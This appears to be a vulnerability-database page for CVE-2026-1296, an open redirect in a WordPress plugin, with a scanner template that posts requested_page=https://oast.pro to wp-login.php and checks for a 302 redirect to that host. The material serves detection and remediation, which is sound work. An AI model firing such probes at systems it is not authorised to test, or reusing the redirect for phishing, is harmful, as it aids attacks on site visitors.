/Vulnerability Library

Frontend Post Submission Manager Lite <= 1.2.7 - Open Redirect

CVE-2026-1296
Verified

Description

The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

0%

Published Date

March 16, 2026

Template Author

shivam kamboj

CVE-2026-1296.yaml
id: CVE-2026-1296

info:
  name: Frontend Post Submission Manager Lite <= 1.2.7 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can redirect users to malicious sites, potentially leading to phishing or malware exposure.
  remediation: |
    Update to a version later than 1.2.7 or the latest available version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite-127-unauthenticated-open-redirect-via-requested-page-parameter
    - http://nvd.nist.gov/vuln/detail/CVE-2026-1296
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-1296
    epss-score: 0.00387
    epss-percentile: 0.59957
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,frontend-post-submission-manager-lite

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log=&pwd=&wp-submit=Log+In&action=login&requested_page=https://oast.pro

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1

      - type: status
        status:
          - 302
# digest: 490a0046304402204ba2044669c6bd0522d297ba9eee4f474421d2fcf6b44d70759836d5a9860acd02201fa9990d91ad776b32b51f97befd61aaf4b0dafe594dea678222b8f939510a80:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-1296
CWE ID:
cwe-601

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite-127-unauthenticated-open-redirect-via-requested-page-parameterhttp://nvd.nist.gov/vuln/detail/CVE-2026-1296

Remediation Steps

Update to a version later than 1.2.7 or the latest available version.